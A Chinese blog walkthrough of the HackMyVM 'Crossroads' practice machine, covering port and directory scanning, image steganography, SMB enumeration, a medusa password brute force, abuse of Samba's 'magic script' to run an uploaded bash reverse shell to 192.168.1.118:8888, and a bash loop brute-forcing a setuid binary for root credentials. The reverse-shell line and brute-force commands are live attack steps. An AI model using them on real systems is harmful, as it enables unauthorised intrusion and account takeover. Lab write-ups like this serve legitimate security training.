HackMyVM:CROSSROADS:1靶场解题过程

最新推荐文章于 2025-05-18 18:53:37 发布
最新推荐文章于 2025-05-18 18:53:37 发布
阅读量897 收藏 11
点赞数 30
分类专栏: 靶场 文章标签: linux 运维 服务器 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74138139/article/details/145861855
版权

信息收集

寻找目标靶机地址

其中1.1是网关地址,所以目标靶机就是1.147

端口扫描

找到目标靶机之后下一步就是进行端口全面扫描

nmap -p 1-65535 -A 192.168.1.147 -sV -T4

看到常见的80端口,顺便访问

发现这个靶机开启了smb服务,可以把这个服务当成文件共享服务。

网页信息

渗透开始

扫描目录

 dirsearch -u http://192.168.1.147

发现robots.txt,直接查看

发现一张图片,继续查看

将图片下载下来

sudo curl -o /home/kali/Desktop/crossroads.png http://192.168.1.147/crossroads.png

图片信息爆破

kali中进行基础binwalk提取

隐藏的 Zlib 压缩数据可能格式异常,或者在文件中嵌入的方式不符合 binwalk 支持的常规格式,从而使 binwalk 无法正确提取。

隐写

寻找是否有隐写,首先需要下载工具stegoveritas

pip3 install stegoveritas

stegoveritas_install_deps

两步下载,成功之后查看图片信息

生成一个新的文件夹:results查看一下

所有的目录都看了一下并没有发现啥呢么有用的东西。

smb

尝试看看smb,用enum4linux命令,在 Linux 系统下用于枚举 SMB 服务信息,它可以收集目标主机上的用户、组、共享文件夹等信息。

enum4linux -a 192.168.1.117

发现共享目录smbshare

并且发现一个账户albert

使用medusa工具进行smb密码爆破

medusa -h 192.168.1.147 -u albert -P /usr/share/wordlists/rockyou.txt -M smbnt

得到密码bradley1

漏洞利用

登录smb服务

smbclient //192.168.1.147/smbshare/ -U albert%bradley1

登陆成功,也可以从文件夹登录

smb://192.168.1.147

进入smbshare

使用get命令将配置文件下载到kali查看

magic script选项为魔术脚本,这个选项如果被设置了具体文件名,则Samba将在用户打开和关闭文件后立即运行该文件。

上传shell脚本

bash -c 'bash -i >&/dev/tcp/192.168.1.118/8888 0>&1'

打开监听,上传脚本,实现连接。(先开监听再将脚本拖进去就好了)

nc -lvp 8888

监听成功之后

拿到我们albert普通用户权限

提权

生成交互式shell

交互式shell通常用于在受限的 shell 环境(例如反向 shell 或受限 shell)中,升级到一个完全交互式的 shell。它可以启用作业控制、Tab 补全以及更好的终端信号处理等功能。

python -c "import pty;pty.spawn('/bin/bash');"

1/2flag

我们发现所在的是smbshare共享文件夹,接着我们返回上一层看一下,发现user.txt,进入之后发现一半flag

爆破图片隐写

并且再次发现crossroads.png这张图片,使用smb连接进albert目录,使用get命令下载图片

smbclient //192.168.1.147/albert/ -U albert%bradley1
get crossroads.png

将这个图片下载下来并且使用隐写工具stegoveritas将其内容提出

提出的内容会在results文件夹下,查看里面的东西

第一个文件就是密码本

为了方便给他变成pass.txt文件

返回上层还有个beroot文件,运行发现需要密码

用到上面的密码本,并写一个爆破脚本pass

#!/bin/bash
 
# 检查 pass.txt 文件是否存在
if [ ! -f "pass.txt" ]; then
    echo "Error: pass.txt file not found."
    exit 1
fi
 
# 使用 while 循环逐行读取 pass.txt 文件
while IFS= read -r pass; do
    # 使用 printf 传递密码给 ./beroot 程序
    printf "%s\n" "$pass" | ./beroot
    # 检查 ./beroot 程序的返回状态码
    if [ $? -ne 0 ]; then
        echo "Error: Failed to execute ./beroot with password: $pass"
    fi
done < pass.txt

将脚本和密码本都上传到smb服务上,再移动到albert路径下(拖进共享文件夹)

进入root

运行pass脚本

./pass

发现多了一个rootcreds文件,cat查看,爆出了账号root密码___drifting___

成功进入root

找到另一半flag

CROSSROADS: 1实战演练
龙狼刺的博客
06-22 383
【代码】CROSSROADS: 1实战演练。
stegoVeritas:另一个Stego工具
04-29
StegoVeritas 另一个Stego工具 快速开始 安装 选项1-点 $ pip3 install stegoveritas $ stegoveritas_install_deps stegoveritas_install_deps当前支持:ubuntu,debian,kali,parrotOS,fedora,archlinux。 选项2-泊坞窗 $ sudo docker run -it --rm bannsec/stegoveritas 选项3- $ sudo pacman -S stegoveritas 跑步 StegoVeritas对大多数图像类型(gif,jpeg,png,tiff,bmp)具有默认操作,并将尝试在任何文件上运行。 stegoveritas <file> 如果您想做一些特定的事情,可以查看帮助: stegoveritas -h usage: s
StegoVeritas 项目常见问题解决方案
gitblog_01032的博客
01-19 571
StegoVeritas 项目常见问题解决方案 stegoVeritas Yet another Stego Tool 项目地址: https://gitcode.com/gh_mirrors/st/stegoVeritas ...
VulnHub:crossroads靶机实战
Aukum的博客
07-03 1317
smb+反弹shell+图片隐写+suid提权,拿下vulnhub-crossroads
crossroads1 靶机
lx_Zyu的博客
06-05 539
有一个beroot 运行一下 要我们输入root用户的密码回车,我们没有密码。文件夹下的这个文件大小要网页上的那个文件大,里面可能藏有东西。这里使用file是查看一下这些文件是什么文件类型。发现网页上的这个图片和文件里面的这个图片不一样。cd 进去发现有一些文件,使用file查看一下。发现在其下有一个png和网页上的那个名字一样。ls查看一下有个smb.conf 文件。还有一个user.txt文件 看一下。执行完后在本地生成一个results。开启靶机的web服务 8000端口。
HackMyVM-Crossroads
qq_52273419的博客
03-09 395
enum4linux用于收集SMB服务相关信息,包括共享资源、用户信息、工作组信息等-a:执行所有枚举选项-u:指定用户名-P:指定字典-M:指定要爆破的服务模块用于检测和提取图像文件中隐藏信息。
crossroads_vh解题过程
qq_74263993的博客
02-26 344
magic script选项为魔术脚本,这个选项如果被设置了具体文件名,则Samba将在用户打开和关闭文件后立即运行该文件。将这个图片下载下来并且使用隐写工具stegoveritas将其内容提出。将脚本和密码本都上传到smb服务上,再移动到albert路径下。打开监听,上传脚本,实现连接。访问/crossroads.png发现是章图片,信息中断。发现开启了80,139,445端口外还开启了smb服务。4.将beroot文件下载下来,发现它自带提权功能。在keepers目录下的第一个文件就是一个密码本。
CROSSROADS1靶机复盘
weixin_44681307的博客
07-16 384
我们就想到了刚才跟靶机中拷贝到我们自己电脑上的图片文件,经过尝试,这个图片是利用stegoveritas 把数据隐写进去的,首先我们安装stegoveritas工具,需要用到python。我们发现配置文件里面显示SMB会执行的一个脚本,但是smb里面又没有这个脚本,所以我们可以自己创建一个这样的脚本,然后上传到smb上面来。这里我们发现很多文件,挨个file以下,发现有一个text文件,查看了以下发现是个密码字典,我们把这个密码字典拷贝走。发现只有一个文件,我们get到我们本机上,这是smb的配置文件。
crossroads.js: 简洁易用的路由库
gitblog_00037的博客
03-15 941
crossroads.js: 简洁易用的路由库 去发现同类优质开源项目:https://gitcode.com/ 是一个轻量级的 JavaScript 路由库,它可以帮助您轻松地将 URL 映射到应用程序的不同部分,并在 URL 发生更改时触发相应的事件。 什么是 Crossroads.js? Crossroads.js 是一个基于事件驱动的 JavaScript 模块,用于将 URL 映射到不同...
快速道路建设插件:Easy Roads Mesh Gen v2020.1
10-08
Easy Roads Mesh Gen v2020.1插件的设计目标是简化游戏场景中道路与地形的生成过程。其用户友好的界面允许开发者通过简单的拖拽操作将导航点放置到指定位置,工具将自动完成道路的生成。这样的设计不仅减少了手动...
前端项目-crossroads.zip
09-02
1. **路由解析**:crossroads.js允许开发者定义URL模式,并将其与特定的处理函数关联。当URL改变时,crossroads.js会自动解析URL并找到相应的处理函数执行。 2. **灵活性**:由于其设计,crossroads.js不仅适用于...
JumpyStreets:Crossy Roads Clone统一制造
04-22
"JumpyStreets"是针对热门游戏"Crossy Roads"的克隆版本,采用C#语言进行编写,旨在提供一个实战性的编程练习平台。 C#是一种面向对象的编程语言,由微软公司推出,广泛应用于Windows平台的游戏开发,尤其是Unity...
portal:Hampton Roads PHP用户组的网站
05-22
这是Hampton Roads PHP用户组网站的代码。 它由供电。 安装 建立项目 为了构建该项目,您需要同时安装和 。 分叉并克隆存储库以将其本地安装,然后运行以下命令以安装所需的依赖项并运行构建: cd my/project/dir ...
Crossroads Tab by Cream .pdf
09-11
Crossroads Tab by Cream》是一份专为中级进阶吉他手设计的曲谱,它包含了著名乐队Cream演绎的经典摇滚乐曲目《Crossroads》的吉他部分乐谱。这首歌曲在全球吉他爱好者中广受欢迎,尤其对于想要挑战更高级演奏技巧...
Linux rpmsg源码分析
小伟的博客
05-18 735
RPMsg是利用通道进行数据通信,先用 /dev/rpmsg_ctrl0 设备通过ioctrl生成端点,然后使用生成的端点进行通讯名称服务,VIRTIO_RPMSG_F_NS 宏,不开启就不使用名称服务,使用就需要m核心先发送信息才可以注册设备m核心LinuxRPMsg内核驱动框架涉及到RPMsg框架、virtio框架、remoteproc子系统和mailbox子系统mailbox,驱动开发者可自我注册client生成设备提供APP层直接进行核间通信分析物理层,创建virtio dev。
Linux笔记】——Linux线程封装
GGDxianv的博客
05-17 1317
本文介绍了在Linux环境下基于pthread库的线程封装类,旨在简化多线程编程的复杂性。该封装类提供了线程的创建、启动、终止、分离和回收等功能。核心功能包括通过Start()方法创建并启动线程,Stop()方法终止线程,Detach()方法将线程设置为分离状态,以及Join()方法回收线程资源。封装类通过静态成员函数routine和this指针的巧妙结合,解决了线程函数与类成员函数的兼容性问题。源码展示了线程类的实现细节,包括线程ID、状态标志、线程名称和回调函数的封装。该封装类为多线程编程提供了简洁高效
[Linux]系统调用read函数
myloveasuka的博客
05-17 1249
read 函数是 Linux 中常用的系统调用之一,用于从文件或设备读取数据。其基本形式为 ssize_t read(int fd, void *buf, size_t count),其中 fd 是文件描述符,buf 是用户提供的缓冲区,count 是要读取的字节数。
Linux(2)——shell原理及Linux中的权限
最新发布
2301_80065652的博客
05-18 726
该提示是说你没有被超级用户(root)添加到信用列表(sudoers)当中,所以该条指令的权限得不到提升(你可以想想嘛,怎么可能让一个普通用户随意更改另一个普通用户的密码),只有当你被超级用户添加到信任列表后,你才拥有提升当前指令权限的能力。但实际上你会发现,你所创建出来的文件和目录的权限值往往不是我们所翻译出来的值,原因就是创建文件和目录的时候还要受到umask的影响,假设默认权限是mask,则实际创建出来的文件权限是:mask&(~umask)(2)将核心处理的结果返回给给用户。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值